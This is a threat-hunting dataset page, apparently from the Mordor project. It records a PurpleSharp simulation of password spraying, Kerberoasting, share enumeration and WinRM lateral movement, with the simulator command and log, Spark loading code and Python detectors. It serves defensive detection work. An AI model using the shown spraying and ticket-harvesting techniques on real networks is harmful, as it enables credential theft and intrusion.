PurpleSharp Active Directory Playbook I
Metadata

| | |
|---|---|
| Author | Roberto Rodriguez @Cyb3rWard0g, Mauricio Velazco @mvelazco |
| Creation Date | 2020/10/22 |
| Modification Date | 2020/10/22 |
| Tactics | |
| Techniques | |
| Tags | None |
Dataset Description
This dataset captures a PurpleSharp simulation, run from a domain-joined workstation as a regular domain user, of four Active Directory techniques: brute-forcing domain user passwords with one NTLM attempt per account (T1110.003, password spraying), requesting Kerberos ticket-granting service (TGS) tickets for every service principal name (SPN) in the domain to obtain crackable hashes (T1558.003, Kerberoasting), enumerating remote network shares on neighbouring hosts (T1135), and moving laterally by starting processes over Windows Remote Management (T1021.006).
Datasets Downloads

| Dataset Type | Link |
|---|---|
| Host | |
| Network | |
Adversary View
c:\Users\pgustavo\Downloads>PurpleSharp.exe /t T1110.003,T1558.003,T1135,T1021.006
10/22/2020 04:29:52 [*] Starting T1110.003 Simulation on WORKSTATION5
10/22/2020 04:29:52 [*] Simulator running from c:\Users\pgustavo\Downloads\PurpleSharp.exe with PID:7520 as THESHIRE\pgustavo
10/22/2020 04:29:52 [*] Local Domain Brute Force using the LogonUser Win32 API function
[*] Targeting domain neighbor users
[*] Using LogonServer MORDORDC.theshire.local for LDAP queries
[*] Querying for active domain users with badPwdCount <= 3..
10/22/2020 04:29:53 [*] Obtained 7 user accounts
10/22/2020 04:29:53 [*] Tried to authenticate as lrodriguez (NTLM). Error Code:1326
10/22/2020 04:29:53 [*] Tried to authenticate as pgustavo (NTLM). Error Code:1326
10/22/2020 04:29:53 [*] Tried to authenticate as sysmonsvc (NTLM). Error Code:1326
10/22/2020 04:29:53 [*] Tried to authenticate as sbeavers (NTLM). Error Code:1326
10/22/2020 04:29:53 [*] Tried to authenticate as mscott (NTLM). Error Code:1326
10/22/2020 04:29:53 [*] Tried to authenticate as pbeesly (NTLM). Error Code:1326
10/22/2020 04:29:53 [*] Tried to authenticate as nxlogsvc (NTLM). Error Code:1326
10/22/2020 04:29:53 [*] Simulation Finished
10/22/2020 04:29:53 [*] Starting T1558.003 Simulation on WORKSTATION5
10/22/2020 04:29:53 [*] Simulator running from c:\Users\pgustavo\Downloads\PurpleSharp.exe with PID:7520 as THESHIRE\pgustavo
10/22/2020 04:29:54 [*] Obtained service ticket and hash for SPN Sysmon/theshire.local (sysmonsvc)
10/22/2020 04:29:54 [*] Obtained service ticket and hash for SPN Nxlog/theshire.local (nxlogsvc)
10/22/2020 04:29:54 [*] Obtained service ticket and hash for SPN Defense/theshire.local (defensesvc)
10/22/2020 04:29:54 [*] Obtained service ticket and hash for SPN OTR/theshire.local (otrsvc)
10/22/2020 04:29:54 [*] Obtained service ticket and hash for SPN Ring/theshire.local (mordorsvc)
10/22/2020 04:29:54 [*] Simulation Finished
10/22/2020 04:29:54 [*] Starting T1135 Simulation on WORKSTATION5
10/22/2020 04:29:54 [*] Simulator running from c:\Users\pgustavo\Downloads\PurpleSharp.exe with PID:7520 as THESHIRE\pgustavo
10/22/2020 04:29:54 [*] Using the Win32 API NetShareEnum function to execute this technique
[*] Obtaining domain neighbor targets ...
[*] Using MORDORDC.theshire.local for LDAP queries
10/22/2020 04:29:54 [*] Obtained 4 target computers
10/22/2020 04:29:54 [*] Successfully enumerated shares on WEC.theshire.local as THESHIRE\pgustavo
10/22/2020 04:29:54 [*] Successfully enumerated shares on WORKSTATION6.theshire.local as THESHIRE\pgustavo
10/22/2020 04:29:54 [*] Successfully enumerated shares on MORDORDC.theshire.local as THESHIRE\pgustavo
10/22/2020 04:29:54 [*] Successfully enumerated shares on WORKSTATION7.theshire.local as THESHIRE\pgustavo
10/22/2020 04:29:54 [*] Simulation Finished
10/22/2020 04:29:54 [*] Starting T1021.006 Simulation on WORKSTATION5
10/22/2020 04:29:54 [*] Simulator running from c:\Users\pgustavo\Downloads\PurpleSharp.exe with PID:7520 as THESHIRE\pgustavo
10/22/2020 04:29:54 [*] Using the System.Management.Automation .NET namespace to execute this technique
10/22/2020 04:29:54 [*] Querying LDAP for random targets...
[*] Obtaining domain neighbor targets ...
[*] Using MORDORDC.theshire.local for LDAP queries
10/22/2020 04:29:54 [*] Obtained 4 target computers
10/22/2020 04:29:59 [*] Started a process using WinRM on WORKSTATION7
10/22/2020 04:30:00 [*] Started a process using WinRM on WEC
10/22/2020 04:30:00 [*] Started a process using WinRM on WORKSTATION6
10/22/2020 04:30:01 [*] Started a process using WinRM on MORDORDC
10/22/2020 04:30:01 [*] Simulation Finished
10/22/2020 04:30:01 [*] Playbook Finished
c:\Users\pgustavo\Downloads>
Explore Mordor Dataset
Initialize Analytics Engine
from openhunt.mordorutils import *
spark = get_spark()
Download & Process Mordor File
mordor_file = "https://raw.githubusercontent.com/OTRF/mordor/master/datasets/small/windows/lateral_movement/host/purplesharp_ad_playbook_I.zip"
registerMordorSQLTable(spark, mordor_file, "mordorTable")
[+] Processing a Spark DataFrame..
[+] DataFrame Returned !
[+] Temporary SparkSQL View: mordorTable
Get to know your data
df = spark.sql(
'''
SELECT Hostname,Channel,EventID, Count(*) as count
FROM mordorTable
GROUP BY Hostname,Channel,EventID
ORDER BY count DESC
'''
)
df.show(truncate=False)
+---------------------------+----------------------------------------+-------+-----+
|Hostname |Channel |EventID|count|
+---------------------------+----------------------------------------+-------+-----+
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational |12 |15747|
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |12 |1027 |
|WORKSTATION7.theshire.local|Microsoft-Windows-Sysmon/Operational |12 |1025 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational |13 |649 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational |7 |532 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |7 |422 |
|WORKSTATION7.theshire.local|Microsoft-Windows-Sysmon/Operational |7 |414 |
|MORDORDC.theshire.local |Security |4658 |409 |
|MORDORDC.theshire.local |Microsoft-Windows-PowerShell/Operational|4103 |277 |
|MORDORDC.theshire.local |Windows PowerShell |800 |277 |
|WORKSTATION7.theshire.local|Microsoft-Windows-Sysmon/Operational |11 |212 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |13 |212 |
|MORDORDC.theshire.local |Security |4656 |212 |
|WORKSTATION7.theshire.local|Microsoft-Windows-Sysmon/Operational |13 |212 |
|WORKSTATION6.theshire.local|Microsoft-Windows-Sysmon/Operational |11 |210 |
|MORDORDC.theshire.local |Security |4690 |204 |
|MORDORDC.theshire.local |Microsoft-Windows-Sysmon/Operational |11 |203 |
|WORKSTATION5.theshire.local|Microsoft-Windows-Sysmon/Operational |7 |169 |
|WORKSTATION6.theshire.local|Security |4658 |159 |
|WORKSTATION7.theshire.local|Security |4658 |159 |
+---------------------------+----------------------------------------+-------+-----+
only showing top 20 rows
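The count above only says which channels and event IDs are present; the next step is to hunt for each of the four simulated techniques. The block below is an added example, not code from the Mordor page or from PurpleSharp. It runs the same "one source touching many distinct targets" grouping that you would write as a GROUP BY over mordorTable, but in plain Python over constructed sample events so it works offline. The events are made up for illustration (hosts, users and SPNs are borrowed from the adversary view; IPs, paths and timestamps are invented) and their field names are the Windows event XML names that Mordor keeps after flattening (TargetUserName, Workstation, Status, ServiceName, TicketEncryptionType, RelativeTargetName, ParentImage, User). The telemetry assumptions are: a LogonUser NTLM attempt against a domain account is validated by the DC and shows up there as 4776 with status 0xC000006A; Kerberoasting requests RC4 (0x17) service tickets as 4769; NetShareEnum reaches the srvsvc named pipe over IPC$, logged as 5145 when Detailed File Share auditing is on; and a WinRM command runs as a child of wsmprovhost.exe, logged as Sysmon event 1. None of these were verified against this particular dataset (the top-20 table does not show them), so confirm the IDs are present before relying on the thresholds.

```python
# Added example (not part of the Mordor page or PurpleSharp): detection logic for
# the four techniques in this playbook, run over CONSTRUCTED events that mimic the
# dataset's flattened schema (Hostname/Channel/EventID as on the page; the other
# field names are the Windows event XML names, e.g. TargetUserName, ServiceName).
from collections import defaultdict
from datetime import datetime, timedelta

T0 = datetime(2020, 10, 22, 4, 29, 50)  # invented base time for the sample events


def _ts(seconds):
    return (T0 + timedelta(seconds=seconds)).isoformat()


DC = "MORDORDC.theshire.local"
TARGETS = ["WEC.theshire.local", "WORKSTATION6.theshire.local",
           "MORDORDC.theshire.local", "WORKSTATION7.theshire.local"]
SPRAYED = ["lrodriguez", "pgustavo", "sysmonsvc", "sbeavers", "mscott", "pbeesly", "nxlogsvc"]
ROASTED = ["sysmonsvc", "nxlogsvc", "defensesvc", "otrsvc", "mordorsvc"]

SAMPLE_EVENTS = (
    # T1110.003: the DC validates each NTLM attempt (4776); 0xC000006A = wrong password
    [{"@timestamp": _ts(3), "Hostname": DC, "Channel": "Security", "EventID": 4776,
      "TargetUserName": u, "Workstation": "WORKSTATION5", "Status": "0xc000006a"} for u in SPRAYED]
    # T1558.003: one principal asks for RC4 (0x17) service tickets for many SPNs (4769)
    + [{"@timestamp": _ts(4), "Hostname": DC, "Channel": "Security", "EventID": 4769,
        "TargetUserName": "pgustavo@THESHIRE.LOCAL", "IpAddress": "::ffff:172.18.39.5",
        "ServiceName": s, "TicketEncryptionType": "0x17"} for s in ROASTED]
    # T1135: NetShareEnum talks to the srvsvc pipe over IPC$ on every target (5145)
    + [{"@timestamp": _ts(4), "Hostname": h, "Channel": "Security", "EventID": 5145,
        "SubjectUserName": "pgustavo", "ShareName": "\\\\*\\IPC$", "RelativeTargetName": "srvsvc"}
       for h in TARGETS]
    # T1021.006: WinRM commands run as children of wsmprovhost.exe on every target (Sysmon 1)
    + [{"@timestamp": _ts(9), "Hostname": h, "Channel": "Microsoft-Windows-Sysmon/Operational",
        "EventID": 1, "User": "THESHIRE\\pgustavo", "Image": "C:\\Windows\\System32\\cmd.exe",
        "ParentImage": "C:\\Windows\\System32\\wsmprovhost.exe"} for h in TARGETS]
    # Benign noise that must NOT alert: one mistyped password, one AES ticket for a machine account
    + [{"@timestamp": _ts(40), "Hostname": DC, "Channel": "Security", "EventID": 4776,
        "TargetUserName": "mscott", "Workstation": "WORKSTATION6", "Status": "0xc000006a"},
       {"@timestamp": _ts(41), "Hostname": DC, "Channel": "Security", "EventID": 4769,
        "TargetUserName": "mscott@THESHIRE.LOCAL", "IpAddress": "::ffff:172.18.39.6",
        "ServiceName": "WORKSTATION6$", "TicketEncryptionType": "0x12"}]
)


def fan_out(events, match, key, value, threshold, window=timedelta(minutes=5)):
    """Group events passing `match` by `key`; report keys that touch at least
    `threshold` distinct `value`s inside a sliding time `window`.
    Returns {key: sorted distinct values}."""
    per_key = defaultdict(list)
    for e in events:
        if match(e):
            per_key[e[key]].append((datetime.fromisoformat(e["@timestamp"]), e[value]))
    hits = {}
    for k, rows in per_key.items():
        rows.sort()
        for i, (start, _) in enumerate(rows):
            seen = {v for t, v in rows[i:] if t - start <= window}
            if len(seen) >= threshold:
                hits[k] = sorted(seen)
                break
    return hits


def detect_password_spray(events, threshold=5):
    """Many distinct accounts failing NTLM validation from one source workstation."""
    return fan_out(events,
                   lambda e: e["EventID"] == 4776 and e.get("Status", "").lower() == "0xc000006a",
                   "Workstation", "TargetUserName", threshold)


def detect_kerberoasting(events, threshold=3):
    """One principal requesting RC4 service tickets for many user-account SPNs
    (machine accounts and krbtgt are excluded: they are not roastable targets)."""
    def is_roast(e):
        svc = e.get("ServiceName", "")
        return (e["EventID"] == 4769 and e.get("TicketEncryptionType", "").lower() == "0x17"
                and not svc.endswith("$") and svc.lower() != "krbtgt")
    return fan_out(events, is_roast, "TargetUserName", "ServiceName", threshold)


def detect_share_enumeration(events, threshold=3):
    """One account reaching the srvsvc named pipe (share enumeration) on many hosts."""
    return fan_out(events,
                   lambda e: e["EventID"] == 5145 and e.get("RelativeTargetName", "").lower() == "srvsvc",
                   "SubjectUserName", "Hostname", threshold)


def detect_winrm_fanout(events, threshold=3):
    """One user spawning processes under the WinRM host process on many hosts."""
    return fan_out(events,
                   lambda e: e["EventID"] == 1
                   and e.get("ParentImage", "").lower().endswith("\\wsmprovhost.exe"),
                   "User", "Hostname", threshold)


if __name__ == "__main__":
    for name, fn in [("T1110.003", detect_password_spray), ("T1558.003", detect_kerberoasting),
                     ("T1135", detect_share_enumeration), ("T1021.006", detect_winrm_fanout)]:
        print(name, fn(SAMPLE_EVENTS))
```

Each detector is a fan-out count keyed on the attacker-controlled side (source workstation, requesting principal, or user) and counting the victim side (accounts, SPNs, hosts), which is what separates a spray, a roast or a WinRM sweep from the single failed logon and single AES ticket in the noise rows. The thresholds are starting points: tune them per environment, and drop the window to a minute or two if the playbook is replayed as fast as the adversary view shows (the whole run took about nine seconds).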